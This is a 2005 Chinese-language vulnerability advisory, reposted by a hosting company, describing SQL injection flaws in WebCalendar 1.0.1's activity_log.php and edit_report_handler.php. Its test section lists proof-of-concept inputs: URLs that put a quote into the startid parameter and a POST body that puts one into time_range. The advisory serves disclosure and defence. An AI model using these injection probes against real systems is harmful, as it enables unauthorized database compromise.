WebCalendar多个远程SQL注入漏洞

发布日期：2005-12-01
更新日期：2005-12-01

受影响系统：

WebCalendar WebCalendar 1.0.1

描述：

---

BUGTRAQ ID: 15662

WebCalendar是一款基于WEB的日历系统。

WebCalendar的activity_log.php和edit_report_handler.php模块没有正确的验证输入参数，导致了多个SQL注入漏洞。成功利用这些漏洞的攻击者可以完全入侵数据库系统。

<*来源：lwang （lwang@lwang.org）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113347882110672&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://victimhost/webcalendar/activity_log.php?startid=%27
http://victimhost/webcalendar/activity_log.php?startid='
http://victimhost/webcalendar/activity_log.php?startid='

向http://victimhost/webcalendar/edit_report_handler.php
POST以下变量：

report_name=Unnamed Report&is_global=Y&show_in_trailer=Y&include_header=Y&time_range='&cat_id=1&allow_nav=Y&include_empty=Y&page_template=<dl>${days}</dl>&day_template=<dt><b>${date}</b></dt> <dd><dl>${events}</dl></dd>&event_template=<dt>${name}</dt> <dd><b>Date:</b> ${date}<br /> <b>Time:</b> ${time}<br /> ${description}</dd>

建议：

---

厂商补丁：

WebCalendar
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://webcalendar.sourceforge.net/

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!